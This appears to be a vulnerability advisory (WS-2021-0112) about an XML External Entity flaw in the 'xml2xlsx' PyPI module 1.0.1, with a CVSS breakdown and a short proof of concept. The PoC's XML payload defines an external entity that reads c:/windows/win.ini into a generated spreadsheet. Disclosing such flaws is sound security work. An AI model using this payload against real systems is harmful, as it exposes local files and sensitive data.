We found results for “”
WS-2021-0112
Date: May 20, 2021
Overview
In 'xml2xlsx' PyPi module version 1.0.1 is vulnerable to XML External Entity vulnerability as the function `xml2xlsx()` does not restrict external entities while parsing the specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.Details
The PyPi module 'xml2xlsx' is vulnerable to XML External Entity vulnerability as the function `xml2xlsx()` does not restrict external entities while parsing the specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.PoC Details
The function `xml2xlsx()` does not restrict external entities while parsing the XML data. By leveraging this flaw, an attacker can read an arbitrary file to retain sensitive information as shown in the POC. A file with the name "test.xlsx" will be created, exposing the contents of the `win.ini` file.PoC Code
from xml2xlsx import xml2xlsx template_id = """ <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]> <sheet title="test"> <row><cell>vulnerable</cell></row> <row><cell>&ent;</cell></row> </sheet> // ----------------------------------- f = open('test.xlsx', 'wb') f.write(xml2xlsx(template_id)) f.close()
Affected Environments
1.0.1Prevention
No fixLanguage: Python
Good to know:
Improper Restriction of XML External Entity Reference ('XXE')
CWE-611Upgrade Version
No fix version available
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | None |
Scope (S): | Unchanged |
Confidentiality (C): | Low |
Integrity (I): | Low |
Availability (A): | None |